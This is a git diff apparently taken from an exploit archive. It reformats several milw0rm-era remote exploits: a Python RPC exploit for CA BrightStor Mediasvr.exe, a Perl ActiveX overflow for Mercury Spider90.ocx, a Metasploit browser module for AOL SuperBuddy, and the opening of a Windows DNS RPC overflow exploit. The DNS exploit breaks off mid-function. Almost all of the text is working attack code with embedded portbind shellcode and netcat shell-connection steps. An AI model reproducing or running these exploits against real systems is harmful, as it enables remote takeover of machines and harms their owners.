socket.SOCK_STREAM) - sock.connect((target, port)) - if p == 1: - sock.send(rpc_packet1) - elif p == 2: - sock.send(rpc_packet2) - sock.close () - - -if __name__=="__main__": - try: - target = sys.argv[1] - except IndexError: - print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Exploit' - print '[+] Author: Shirkdog' - print '[+] Usage: %s \n' % sys.argv[0] - sys.exit(-1) - - print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Exploit' - print '[+] Author: Shirkdog' - - GetMediaSvrPort(target) - - print '[+] Exploit sent. 
Using nc to connect to: %s on port 4444' % target - time.sleep(3) - connect = "/usr/bin/nc -vn " + target + " 4444" - os.system(connect) - -# milw0rm.com [2007-03-29] +#!/usr/bin/python +# +# Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Code Exploit +# (Previously Unknown) +# +# There seems to be an design error in the handling of RPC data with xdr procedures +# across several .dll's imported by Mediasvr.exe. Four bytes from an RPC packet are +# processed as a particular address (xdr_handle_t data which is run through multiple bit +# shifts, and reversing of bytes), and eventually loaded into ECX. +# +# The 191 (0xbf) procedure, followed by nulls (at least 8 bytes of nulls, which may +# be Null Credentials and Auth?) leads to an exploitable condition. +# +# .text:0040AACD 008 mov ecx, [esp+8] +# .text:0040AAD1 008 mov dword_418820, esi +# .text:0040AAD7 008 push offset dword_418820 +# .text:0040AADC 00C mov eax, [ecx] +# .text:0040AADE 00C call dword ptr [eax+2Ch] +# +# At this point, you have control of ECX (esp+8 is your address data). The data from the packet +# is stored in memory and is relatively static (see NOTE). +# +# The address is then loaded into EAX, and then called as EAX+2Ch, which is +# controllable data from the packet. In this code, I just jump ahead to +# the portbinding shellcode. +# +# NOTE: The only issue I have found is when the system is rebooted, the packet data +# appears at a higher memory location when Mediasvr.exe crashes +# and is restarted. 
I have accounted for this in the code, when the port that +# Mediasvr.exe is listening on is below TCP port 1100, which is usually only after +# a reboot +# +# This was tested on BrightStor ARCserve Backup 11.5.2.0 (SP2) with the latest +# CA patches on Windows XP SP2 (I believe there is some issue with SP1, which +# is more then likely the memory locations) +# +# The patches include the following updates to Mediasvr.exe +# http://supportconnectw.ca.com/public/storage/infodocs/babimpsec-notice.asp +# +# CA has been notified +# +# Author: M. Shirk +# Tester: Tebodell +# +# (c) Copyright 2007 (Shirkdog Security) shirkdog_list $ at % hotmail dot com +# +# Use at your own Risk: You have been warned +#------------------------------------------------------------------------ + +import os +import sys +import time +import socket +import struct + +#------------------------------------------------------------------------ + +#Portbind shellcode; Binds shell on TCP port 4444 +shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" +shellcode += "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" +shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58" +shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57" +shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38" +shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58" +shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" +shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" +shellcode += 
"\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48" +shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54" +shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58" +shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d" +shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38" +shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56" +shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36" +shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57" +shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e" +shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e" +shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30" +shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35" +shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34" +shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41" +shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a" +shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31" +shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" +shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d" +shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d" +shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56" +shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45" +shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46" +shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c" +shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c" +shellcode += 
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32" +shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36" +shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f" +shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36" +shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56" +shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56" +shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" +shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" +shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d" +shellcode += "\x4f\x4f\x42\x4d\x5a\x90" + +#------------------------------------------------------------------------ + +#First Packet +rpc_packet1="\x80\x00\x80\x34\x65\xcf\x4c\x7b\x00\x00\x00\x00\x00\x00\x00" +rpc_packet1+="\x02\x00\x06\x09\x7e\x00\x00\x00\x01" + +#Prodcedure 191 and nulls +rpc_packet1+="\x00\x00\x00\xbf\x00\x00\x00\x00\x00\x00\x00\x00" + +#Apparently these 4 bytes can be anything +rpc_packet1+="\x00\x00\x00\x00" + +#This value is important for the location of the next address +rpc_packet1+="\x00\x00\x00\x00" + +#Hardcoded Address loaded into ECX +rpc_packet1+="\x00\xae\x27\x64" + +#Just spacing +rpc_packet1+="\x41\x42\x43\x44" + +#Addess in memory, loaded into EAX and called with EAX+2Ch to get to shellcode +rpc_packet1+="\x3c\x27\xae\x00" + +#jump to shellcode for packet 1 +rpc_packet1+="\x6c\x27\xae\x00" +rpc_packet1+="\xeb\x01" +rpc_packet1+=shellcode + +#------------------------------------------------------------------------ + +#Second Packet +rpc_packet2="\x80\x00\x80\x34\x65\xcf\x4c\x7b\x00\x00\x00\x00\x00\x00\x00" +rpc_packet2+="\x02\x00\x06\x09\x7e\x00\x00\x00\x01" + +#Procedure 191 and nulls +rpc_packet2+="\x00\x00\x00\xbf\x00\x00\x00\x00\x00\x00\x00\x00" + +#Apparently these 4 bytes can be anything +rpc_packet2+="\x00\x00\x00\x00" + 
+#This value is important for the location of the next address +rpc_packet2+="\x00\x00\x00\x00" + +#Hardcoded Address loaded into ECX that seems to be hit after Mediasvr.exe has been +#restarted +rpc_packet2+="\x00\x9e\x27\x64" + +#Just spacing +rpc_packet2+="\x41\x42\x43\x44" + +#Addess stored in memory, loaded into EAX and called with EAX+2Ch to get to shellcode +rpc_packet2+="\x3c\x27\x9e\x00" + +#jump to shellcode for packet 2 +rpc_packet2+="\x6c\x27\x9e\x00" +rpc_packet2+="\xeb\x01" +rpc_packet2+=shellcode + +# Portmap request for Mediasvr.exe +rpc_portmap_req="\x80\x00\x00\x38\x21\x84\xf7\xc9\x00\x00\x00\x00\x00\x00\x00" +rpc_portmap_req+="\x02\x00\x01\x86\xa0\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00" +rpc_portmap_req+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +rpc_portmap_req+="\x06\x09\x7e\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x00" + +#------------------------------------------------------------------------ + +def GetMediaSvrPort(target): + sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) + sock.connect((target,111)) + sock.send(rpc_portmap_req) + rec = sock.recv(256) + sock.close() + + port1 = rec[-4] + port2 = rec[-3] + port3 = rec[-2] + port4 = rec[-1] + + port1 = hex(ord(port1)) + port2 = hex(ord(port2)) + port3 = hex(ord(port3)) + port4 = hex(ord(port4)) + port = '%02x%02x%02x%02x' % (int(port1,16),int(port2,16),int(port3,16),int(port4,16)) + + port = int(port,16) + if port < 1100: + print '[+] Fresh Meat: Mediasvr.exe has not been restarted, Sending Packet 1 to: Target: %s Port: %s' %(target,port) + ExploitMediaSvr(target,port,1) + else: + print '[+] Mediasvr.exe has been restarted, Sending Packet 2 to: Target: %s Port: %s' % (target,port) + ExploitMediaSvr(target,port,2) + +def ExploitMediaSvr(target,port,p): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect((target, port)) + if p == 1: + sock.send(rpc_packet1) + elif p == 2: + sock.send(rpc_packet2) + sock.close () + + +if 
__name__=="__main__": + try: + target = sys.argv[1] + except IndexError: + print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Exploit' + print '[+] Author: Shirkdog' + print '[+] Usage: %s \n' % sys.argv[0] + sys.exit(-1) + + print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Exploit' + print '[+] Author: Shirkdog' + + GetMediaSvrPort(target) + + print '[+] Exploit sent. Using nc to connect to: %s on port 4444' % target + time.sleep(3) + connect = "/usr/bin/nc -vn " + target + " 4444" + os.system(connect) + +# milw0rm.com [2007-03-29] diff --git a/platforms/windows/remote/361.txt b/platforms/windows/remote/361.txt index 265871e54..7412b7f54 100755 --- a/platforms/windows/remote/361.txt +++ b/platforms/windows/remote/361.txt @@ -39,6 +39,6 @@ ftp> cd / 501 Cannot accept relative path using dot notation ftp> pwd ---> XPWD -257 "/C:/" is current directory. - -# milw0rm.com [2004-07-22] +257 "/C:/" is current directory. + +# milw0rm.com [2004-07-22] diff --git a/platforms/windows/remote/3661.pl b/platforms/windows/remote/3661.pl index 237586c42..f3d674a90 100755 --- a/platforms/windows/remote/3661.pl +++ b/platforms/windows/remote/3661.pl 
@@ -1,112 +1,112 @@ -#!/usr/bin/perl -# POC exploit for Mercury Quality Center Spider90.ocx ProgColor Overflow -# credit to Skylined, Trirat Puttaraksa, HDM Skape and the rest of the -# metasploit crew. This exploit is just a cut and paste of thier code they # deserve the credit -# Vulnerability found by Titon and Ri0t of Bastardlabs - -use strict; - -# win32_bind LPORT = 5555 - Metasploit -my $shellcode = -"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45". -"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49". -"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d". -"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66". -"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61". -"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40". -"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32". -"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6". -"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09". -"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0". -"\x66\x68\x15\xb3\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff". -"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53". -"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff". -"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64". -"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89". -"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab". -"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51". -"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53". -"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6". -"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"; - -my $jscript = -""; - -my $header = -"\n" . -"\n" . -"\n" . -$jscript . -"\n"; - -my $footer = -"\n" . -""; - -my $body = -"\n" . -"\n" . -"\n" . -"\n" . 
-""; - -my $page = "\xff\xfe"; # magic number of M$ unicode file -my $c; - - -foreach $c (split //, ($header)) { - $page = $page . $c . "\x00"; -} - - - -foreach $c (split //, ($body . $footer)) { - $page = $page . $c . "\x00"; -} - -open (IE, ">", "exploit.html"); - -print IE $page; - -close IE; - -# This function copy from JSUnescape() code in Metasploit -sub convert_shellcode { - my $data = shift; - my $mode = shift() || 'LE'; - my $code = ''; - - # Encode the shellcode via %u sequences for JS's unescape() function - my $idx = 0; - - # Pad to an even number of bytes - if (length($data) % 2 != 0) { - $data .= substr($data, -1, 1); - } - - while ($idx < length($data) - 1) { - my $c1 = ord(substr($data, $idx, 1)); - my $c2 = ord(substr($data, $idx+1, 1)); - if ($mode eq 'LE') { - $code .= sprintf('%%u%.2x%.2x', $c2, $c1); - } else { - $code .= sprintf('%%u%.2x%.2x', $c1, $c2); - } - $idx += 2; - } - - return $code; -} - -# milw0rm.com [2007-04-04] +#!/usr/bin/perl +# POC exploit for Mercury Quality Center Spider90.ocx ProgColor Overflow +# credit to Skylined, Trirat Puttaraksa, HDM Skape and the rest of the +# metasploit crew. This exploit is just a cut and paste of thier code they # deserve the credit +# Vulnerability found by Titon and Ri0t of Bastardlabs + +use strict; + +# win32_bind LPORT = 5555 - Metasploit +my $shellcode = +"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45". +"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49". +"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d". +"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66". +"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61". +"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40". +"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32". +"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6". +"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09". 
+"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0". +"\x66\x68\x15\xb3\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff". +"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53". +"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff". +"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64". +"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89". +"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab". +"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51". +"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53". +"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6". +"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"; + +my $jscript = +""; + +my $header = +"\n" . +"\n" . +"\n" . +$jscript . +"\n"; + +my $footer = +"\n" . +""; + +my $body = +"\n" . +"\n" . +"\n" . +"\n" . +""; + +my $page = "\xff\xfe"; # magic number of M$ unicode file +my $c; + + +foreach $c (split //, ($header)) { + $page = $page . $c . "\x00"; +} + + + +foreach $c (split //, ($body . $footer)) { + $page = $page . $c . "\x00"; +} + +open (IE, ">", "exploit.html"); + +print IE $page; + +close IE; + +# This function copy from JSUnescape() code in Metasploit +sub convert_shellcode { + my $data = shift; + my $mode = shift() || 'LE'; + my $code = ''; + + # Encode the shellcode via %u sequences for JS's unescape() function + my $idx = 0; + + # Pad to an even number of bytes + if (length($data) % 2 != 0) { + $data .= substr($data, -1, 1); + } + + while ($idx < length($data) - 1) { + my $c1 = ord(substr($data, $idx, 1)); + my $c2 = ord(substr($data, $idx+1, 1)); + if ($mode eq 'LE') { + $code .= sprintf('%%u%.2x%.2x', $c2, $c1); + } else { + $code .= sprintf('%%u%.2x%.2x', $c1, $c2); + } + $idx += 2; + } + + return $code; +} + +# milw0rm.com [2007-04-04] diff --git a/platforms/windows/remote/3662.rb b/platforms/windows/remote/3662.rb index 8cb5686f3..ffe038c5a 100755 
--- a/platforms/windows/remote/3662.rb
+++ b/platforms/windows/remote/3662.rb
@@ -1,125 +1,124 @@ - -require 'msf/core' - -module Msf - -class Exploits::Windows::Browser::AOL_SuperBuddy_LinkSBIcons < Msf::Exploit::Remote - - include Exploit::Remote::HttpServer::HTML - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'AOL Sb.Superbuddy vulnerability', - 'Description' => %q{ - This module exploits a flaw in AOL Sb.SuperBuddy. We stole this code from a pre-existing metasploit module. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'kradchad', - 'leetpete' - ], - 'Version' => '0.1', - 'References' => - [ - [ 'CVE', 'CVE-2006-5820'] - ], - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00", - - }, - 'Platform' => 'win', - 'Targets' => - [ - ['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ] - ], - 'DefaultTarget' => 0)) - end - - def autofilter - false - end - - def on_request_uri(cli, request) - - # Re-generate the payload - return if ((p = regenerate_payload(cli)) == nil) - - # Encode the shellcode - shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - - # Get a unicode friendly version of the return address - addr_word = [target.ret].pack('V').unpack('H*')[0][0,4] - - # Randomize the javascript variable names - var_buffer = rand_text_alpha(rand(30)+2) - var_shellcode = rand_text_alpha(rand(30)+2) - var_unescape = rand_text_alpha(rand(30)+2) - var_x = rand_text_alpha(rand(30)+2) - var_i = rand_text_alpha(rand(30)+2) - var_tic = rand_text_alpha(rand(30)+2) - var_toc = rand_text_alpha(rand(30)+2) - - # Randomize HTML data - html = rand_text_alpha(rand(30)+2) - - # Build out the message - content = %Q| - - - - - -#{html} - - - | - - # Randomize the whitespace in the document - content.gsub!(/\s+/) do |s| - len = rand(100)+2 - set = "\x09\x20\x0d\x0a" - buf = '' - - while (buf.length < len) - buf << set[rand(set.length)].chr - end - - buf - end - - print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") - - # Transmit the response to the client - 
send_response_html(cli, content) - end - -end - -end - -# milw0rm.com [2007-04-04] +require 'msf/core' + +module Msf + +class Exploits::Windows::Browser::AOL_SuperBuddy_LinkSBIcons < Msf::Exploit::Remote + + include Exploit::Remote::HttpServer::HTML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'AOL Sb.Superbuddy vulnerability', + 'Description' => %q{ + This module exploits a flaw in AOL Sb.SuperBuddy. We stole this code from a pre-existing metasploit module. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'kradchad', + 'leetpete' + ], + 'Version' => '0.1', + 'References' => + [ + [ 'CVE', 'CVE-2006-5820'] + ], + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + + }, + 'Platform' => 'win', + 'Targets' => + [ + ['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ] + ], + 'DefaultTarget' => 0)) + end + + def autofilter + false + end + + def on_request_uri(cli, request) + + # Re-generate the payload + return if ((p = regenerate_payload(cli)) == nil) + + # Encode the shellcode + shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) + + # Get a unicode friendly version of the return address + addr_word = [target.ret].pack('V').unpack('H*')[0][0,4] + + # Randomize the javascript variable names + var_buffer = rand_text_alpha(rand(30)+2) + var_shellcode = rand_text_alpha(rand(30)+2) + var_unescape = rand_text_alpha(rand(30)+2) + var_x = rand_text_alpha(rand(30)+2) + var_i = rand_text_alpha(rand(30)+2) + var_tic = rand_text_alpha(rand(30)+2) + var_toc = rand_text_alpha(rand(30)+2) + + # Randomize HTML data + html = rand_text_alpha(rand(30)+2) + + # Build out the message + content = %Q| + + + + + +#{html} + + + | + + # Randomize the whitespace in the document + content.gsub!(/\s+/) do |s| + len = rand(100)+2 + set = "\x09\x20\x0d\x0a" + buf = '' + + while (buf.length < len) + buf << set[rand(set.length)].chr + end + + buf + end + + print_status("Sending exploit to 
#{cli.peerhost}:#{cli.peerport}...") + + # Transmit the response to the client + send_response_html(cli, content) + end + +end + +end + +# milw0rm.com [2007-04-04] diff --git a/platforms/windows/remote/3737.py b/platforms/windows/remote/3737.py index d57560f2d..0b5f5050f 100755 --- a/platforms/windows/remote/3737.py +++ b/platforms/windows/remote/3737.py 
@@ -1,111 +1,111 @@ -#!/usr/bin/python -# Remote exploit for the 0day Windows DNS RPC service vulnerability as -# described in http://www.securityfocus.com/bid/23470/info. Tested on -# Windows 2000 SP4. The exploit if successful binds a shell to TCP port 4444 -# and then connects to it. -# -# Cheers to metasploit for the first exploit. -# Written for educational and testing purposes. -# Author shall bear no responsibility for any damage caused by using this code -# Winny Thomas :-) - -import os -import sys -import time -from impacket.dcerpc import transport, dcerpc, epm -from impacket import uuid - -#Portbind shellcode from metasploit; Binds port to TCP port 4444 -shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" -shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9" -shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56" -shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22" -shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30" -shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81" -shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42" -shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22" -shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9" -shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79" -shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab" -shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa" -shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48" -shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1" -shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0" -shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe" -shellcode += 
"\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9" -shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84" -shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56" -shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8" -shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79" -shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6" -shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9" - -# Stub sections taken from metasploit -stub = '\xd2\x5f\xab\xdb\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00' -stub += '\x70\x00\x00\x00\x00\x00\x00\x00\x1f\x38\x8a\x9f\x12\x05\x00\x00' -stub += '\x00\x00\x00\x00\x12\x05\x00\x00' -stub += '\\A' * 465 -# At the time of overflow ESP points into our buffer which has each char -# prepended by a '\' and our shellcode code is about 24+ bytes away from -# where EDX points -stub += '\\\x80\\\x62\\\xE1\\\x77'#Address of jmp esp from user32.dll -# The following B's which in assembly translates to 'inc EDX' increments -# about 31 times EDX so that it points into our shellcode -stub += '\\B' * 43 -# Translates to 'jmp EDX' -stub += '\\\xff\\\xe2' -stub += '\\A' * 134 -stub += '\x00\x00\x00\x00\x76\xcf\x80\xfd\x03\x00\x00\x00\x00\x00\x00\x00' -stub += '\x03\x00\x00\x00\x47\x00\x00\x00' -stub += shellcode - -# Code ripped from core security document on impacket -# www.coresecurity.com/files/attachments/impacketv0.9.6.0.pdf -# Not a neat way to discover a dynamic port :-) -def DiscoverDNSport(target): - trans = transport.SMBTransport(target, 139, 'epmapper') - trans.connect() - dce = dcerpc.DCERPC_v5(trans) - dce.bind(uuid.uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA','3.0'))) - pm = epm.DCERPCEpm(dce) - handle = '\x00'*20 - while 1: - dump = pm.portmap_dump(handle) - if not dump.get_entries_num(): - break - handle = dump.get_handle() - entry = dump.get_entry().get_entry() - 
